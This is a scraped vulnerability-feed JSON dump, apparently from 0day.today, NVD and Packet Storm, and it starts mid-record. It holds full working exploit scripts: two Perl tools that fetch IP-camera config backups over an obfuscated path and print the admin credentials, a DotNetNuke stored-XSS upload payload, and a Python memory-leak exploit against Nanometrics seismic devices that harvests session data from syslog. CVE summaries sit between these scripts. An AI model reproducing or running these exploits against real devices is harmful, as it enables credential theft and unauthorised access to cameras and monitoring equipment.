Donev\r\n#\r\n# https://donev.eu/\r\n#\r\n# Disclaimer:\r\n# This or previous programs are for Educational purpose ONLY. Do not use it without permission. \r\n# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages \r\n# caused by direct or indirect use of the information or functionality provided by these programs. \r\n# The author or any Internet provider bears NO responsibility for content or misuse of these programs \r\n# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, \r\n# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's \r\n# responsibility.\r\n# \r\n# Use them at your own risk! \r\n# \r\n# (Dont do anything without permissions)\r\n#\r\n#\t[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\r\n#\t[ ================================================================\r\n#\t[ Exploit Author: Todor Donev 2020 <[email\u00a0protected]>\r\n#\t[ Initializing the browser\r\n#\t[ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)\r\n#\t[ >> Content-Type => application/x-www-form-urlencoded\r\n#\t[ << Connection => close\r\n#\t[ << Date => Sat, 22 Feb 2020 14:10:01 GMT\r\n#\t[ << Accept-Ranges => bytes\r\n#\t[ << Server => thttpd/2.25b 29dec2003\r\n#\t[ << Content-Length => 25893\r\n#\t[ << Content-Type => application/octet-stream\r\n#\t[ << Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT\r\n#\t[ << Client-Date => Sat, 22 Feb 2020 14:10:04 GMT\r\n#\t[ << Client-Peer => 192.168.200.49:8080\r\n#\t[ << Client-Response-Num => 1\r\n#\t[ \r\n#\t[ Username : admin\r\n#\t[ Password : admin\r\n\r\nuse strict;\r\nuse HTTP::Request;\r\nuse LWP::UserAgent;\r\nuse WWW::UserAgent::Random;\r\nuse Gzip::Faster 'gunzip';\r\n\r\nmy $host = shift || ''; # Full path url to the store\r\nmy $cmd = shift || ''; # show - Show configuration dump\r\n$host =~ s/\\/$//;\r\nprint \"\\033[2J\"; #clear the screen\r\nprint \"\\033[0;0H\"; #jump to 0,0\r\nprint \"[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\\n\";\r\nprint \"[ ================================================================\\n\";\r\nprint \"[ Exploit Author: Todor Donev 2020 <todor.donev\\@gmail.com>\\n\";\r\nif ($host !~ m/^http/){ \r\n print \"[ Usage, Password Disclosure: perl $0 https://target:port/\\n\";\r\n print \"[ Usage, Show Configuration : perl $0 https://target:port/ show\\n\";\r\n exit;\r\n}\r\nprint \"[ Initializing the browser\\n\";\r\nmy $user_agent = rand_ua(\"browsers\");\r\nmy $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });\r\n $browser->timeout(30);\r\n $browser->agent($user_agent);\r\n# my $target = $host.\"/config_backup.bin\";\r\n# my $target = $host.\"/tmpfs/config_backup.bin\";\r\nmy $target = $host.\"\\x2f\\x77\\x65\\x62\\x2f\\x63\\x67\\x69\\x2d\\x62\\x69\\x6e\\x2f\\x68\\x69\\x33\\x35\\x31\\x30\\x2f\\x62\\x61\\x63\\x6b\\x75\\x70\\x2e\\x63\\x67\\x69\";\r\nmy $request = HTTP::Request->new (GET => $target,[Content_Type => \"application/x-www-form-urlencoded\"]); \r\nmy $response = $browser->request($request) or die \"[ Exploit Failed: $!\";\r\nprint \"[ >> $_ => \", $request->header($_), \"\\n\" for $request->header_field_names;\r\nprint \"[ << $_ => \", $response->header($_), \"\\n\" for $response->header_field_names;\r\nprint \"[ Exploit failed! Not vulnerable.\\n\" and exit if ($response->code ne 200);\r\nmy $gzipped = $response->content();\r\nmy $config = gunzip($gzipped);\r\nprint \"[ \\n\";\r\nif ($cmd =~ /show/) {\r\n print \"[ >> Configuration dump...\\n[\\n\";\r\n print \"[ \", $_, \"\\n\" for split(/\\n/,$config);\r\n exit;\r\n} else {\r\n print \"[ Username : \", $1, \"\\n\" if ($config =~ /username=(.*)/);\r\n print \"[ Password : \", $1, \"\\n\" if ($config =~ /password=(.*)/);\r\n exit;\r\n}\n\n# 0day.today [2020-02-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34013"}, {"lastseen": "2020-02-25T01:08:31", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "1337DAY-ID-33998", "href": "https://0day.today/exploit/description/33998", "title": "ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Vulnerability", "type": "zdt", "sourceData": "# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure\r\n# Author: Todor Donev\r\n# Vendor: www.escam.cn\r\n# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en\r\n# CVE: N/A\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n# ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\r\n#\r\n# Copyright 2020 (c) Todor Donev\r\n#\r\n# https://donev.eu/\r\n#\r\n# Disclaimer:\r\n# This or previous programs are for Educational purpose ONLY. Do not use it without permission. \r\n# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages \r\n# caused by direct or indirect use of the information or functionality provided by these programs. \r\n# The author or any Internet provider bears NO responsibility for content or misuse of these programs \r\n# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, \r\n# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's \r\n# responsibility.\r\n# \r\n# Use them at your own risk! \r\n# \r\n# (Dont do anything without permissions)\r\n#\r\n#\t[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\r\n#\t[ ===========================================================\r\n#\t[ Exploit Author: Todor Donev 2020 <[email\u00a0protected]>\r\n#\t[ Initializing the browser\r\n#\t[ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8\r\n#\t[ >> Content-Type => application/x-www-form-urlencoded\r\n#\t[ << Connection => close\r\n#\t[ << Date => Fri, 21 Feb 2020 20:23:56 GMT\r\n#\t[ << Accept-Ranges => bytes\r\n#\t[ << Server => thttpd/2.25b 29dec2003\r\n#\t[ << Content-Length => 25003\r\n#\t[ << Content-Type => application/octet-stream\r\n#\t[ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT\r\n#\t[ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT\r\n#\t[ << Client-Peer => 192.168.1.105:8000\r\n#\t[ << Client-Response-Num => 1\r\n#\t[ \r\n#\t[ Username : admin\r\n#\t[ Password : admin\r\n\r\nuse strict;\r\nuse HTTP::Request;\r\nuse LWP::UserAgent;\r\nuse WWW::UserAgent::Random;\r\nuse Gzip::Faster 'gunzip';\r\n\r\nmy $host = shift || ''; # Full path url to the store\r\nmy $cmd = shift || ''; # show - Show configuration dump\r\n$host =~ s/\\/$//;\r\nprint \"\\033[2J\"; #clear the screen\r\nprint \"\\033[0;0H\"; #jump to 0,0\r\nprint \"[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\\n\";\r\nprint \"[ ===========================================================\\n\";\r\nprint \"[ Exploit Author: Todor Donev 2020 <todor.donev\\@gmail.com>\\n\";\r\nif ($host !~ m/^http/){ \r\n print \"[ Usage, Password Disclosure: perl $0 https://target:port/\\n\";\r\n print \"[ Usage, Show Configuration : perl $0 https://target:port/ show\\n\";\r\n exit;\r\n}\r\nprint \"[ Initializing the browser\\n\";\r\nmy $user_agent = rand_ua(\"browsers\");\r\nmy $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });\r\n $browser->timeout(30);\r\n $browser->agent($user_agent);\r\n# my $target = $host.\"/tmpfs/config_backup.bin\";\r\nmy $target = $host.\"\\x2f\\x77\\x65\\x62\\x2f\\x63\\x67\\x69\\x2d\\x62\\x69\\x6e\\x2f\\x68\\x69\\x33\\x35\\x31\\x30\\x2f\\x62\\x61\\x63\\x6b\\x75\\x70\\x2e\\x63\\x67\\x69\";\r\nmy $request = HTTP::Request->new (GET => $target,[Content_Type => \"application/x-www-form-urlencoded\"]); \r\nmy $response = $browser->request($request) or die \"[ Exploit Failed: $!\";\r\nprint \"[ >> $_ => \", $request->header($_), \"\\n\" for $request->header_field_names;\r\nprint \"[ << $_ => \", $response->header($_), \"\\n\" for $response->header_field_names;\r\nprint \"[ Exploit failed! Not vulnerable.\\n\" and exit if ($response->code ne 200);\r\nmy $gzipped = $response->content();\r\nmy $config = gunzip($gzipped);\r\nprint \"[ \\n\";\r\nif ($cmd =~ /show/) {\r\n print \"[ >> Configuration dump...\\n[\\n\";\r\n print \"[ \", $_, \"\\n\" for split(/\\n/,$config);\r\n exit;\r\n} else {\r\n print \"[ Username : \", $1, \"\\n\" if ($config =~ /username=(.*)/);\r\n print \"[ Password : \", $1, \"\\n\" if ($config =~ /password=(.*)/);\r\n exit;\r\n}\n\n# 0day.today [2020-02-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33998"}, {"lastseen": "2020-02-27T01:04:34", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "1337DAY-ID-34011", "href": "https://0day.today/exploit/description/34011", "title": "DotNetNuke 9.5 - Persistent Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting\r\n# Exploit Author: Sajjad Pourali\r\n# Vendor Homepage: http://dnnsoftware.com/\r\n# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip\r\n# Version: <= 9.5\r\n# CVE : N/A\r\n# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175\r\n\r\nDNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the user\u2019s browser.\r\n\r\nIn XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is \u201chttp://www.w3.org/1999/xhtml\u201d which permits us to run XHTML tags such as <script>.\r\n\r\nFor instance, uploading the following code as an XML file executes javascript and shows a non-harmful \u2018XSS\u2019 alert.\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<script xmlns=\"http://www.w3.org/1999/xhtml\">\r\n alert('XSS');\r\n</script>\r\n\r\nThough stealing of authentication cookies are not possible at this time (because the authentication\u2019s cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users\u2019 cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading \u201caspx\u201d extension files through settings page which leads to upload of backdoor files.\n\n# 0day.today [2020-02-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34011"}], "cve": [{"lastseen": "2020-02-22T13:07:25", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketWatcher.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.21, 3.1.x before 3.1.17, and 3.2.x before 3.2.8 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-21T16:17:00", "id": "CVE-2013-4088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4088", "published": "2020-02-21T16:15:00", "title": "CVE-2013-4088", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-22T13:07:25", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketPhone.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.20, 3.1.x before 3.1.16, and 3.2.x before 3.2.7, and OTRS ITSM 3.0.x before 3.0.8, 3.1.x before 3.1.9, and 3.2.x before 3.2.5 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-21T16:17:00", "id": "CVE-2013-3551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3551", "published": "2020-02-21T16:15:00", "title": "CVE-2013-3551", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:06:30", "bulletinFamily": "NVD", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "modified": "2020-02-20T17:18:00", "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-26T12:48:49", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the Android debug bridge (aka adb) in Android 4.0.4 allows physically proximate attackers with a direct connection to the target Android device to write to arbitrary files owned by system via a .. (dot dot) in the tar archive headers.", "modified": "2020-02-25T19:11:00", "id": "CVE-2014-7951", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7951", "published": "2020-02-20T16:15:00", "title": "CVE-2014-7951", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-21T13:06:28", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the __dn_expand function in network/dn_expand.c in musl libc 1.1x before 1.1.2 and 0.9.13 through 1.0.3 allow remote attackers to (1) have unspecified impact via an invalid name length in a DNS response or (2) cause a denial of service (crash) via an invalid name length in a DNS response, related to an infinite loop with no output.", "modified": "2020-02-20T13:07:00", "id": "CVE-2014-3484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3484", "published": "2020-02-20T04:15:00", "title": "CVE-2014-3484", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:08:35", "bulletinFamily": "NVD", "description": "The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in FreeBSD through 10.1 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message.", "modified": "2020-02-20T13:07:00", "published": "2020-02-20T04:15:00", "id": "CVE-2015-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2923", "title": "CVE-2015-2923", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:35:09", "bulletinFamily": "NVD", "description": "Buffer overflow in the afReadFrames function in audiofile (aka libaudiofile and Audio File Library) allows user-assisted remote attackers to cause a denial of service (program crash) or possibly execute arbitrary code via a crafted audio file, as demonstrated by sixteen-stereo-to-eight-mono.c.", "modified": "2020-02-19T21:20:00", "id": "CVE-2015-7747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7747", "published": "2020-02-19T21:15:00", "title": "CVE-2015-7747", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:36:29", "bulletinFamily": "NVD", "description": "OverlayFS in the Linux kernel before 3.0.0-16.28, as used in Ubuntu 10.0.4 LTS and 11.10, is missing inode security checks which could allow attackers to bypass security restrictions and perform unauthorized actions.", "modified": "2020-02-19T18:50:00", "id": "CVE-2012-0055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0055", "published": "2020-02-19T18:15:00", "title": "CVE-2012-0055", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:38:02", "bulletinFamily": "NVD", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "modified": "2020-02-19T15:15:00", "published": "2020-02-19T15:15:00", "id": "CVE-2013-5581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5581", "title": "CVE-2013-5581", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-26T12:51:31", "bulletinFamily": "NVD", "description": "Nokogiri before 1.5.4 is vulnerable to XXE attacks", "modified": "2020-02-25T18:35:00", "id": "CVE-2012-6685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6685", "published": "2020-02-19T15:15:00", "title": "CVE-2012-6685", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-02-20T07:06:03", "bulletinFamily": "exploit", "description": "", "modified": "2020-02-19T00:00:00", "published": "2020-02-19T00:00:00", "id": "PACKETSTORM:156414", "href": "https://packetstormsecurity.com/files/156414/Nanometrics-Centaur-4.3.23-Memory-Leak.html", "title": "Nanometrics Centaur 4.3.23 Memory Leak", "type": "packetstorm", "sourceData": "`# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak \n# Date: 2020-02-15 \n# Author: byteGoblin \n# Vendor: https://www.nanometrics.ca \n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# CVE: N/A \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \n#!/usr/bin/env python3 \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156414/nanometricscentaur4323-leak.txt"}]}
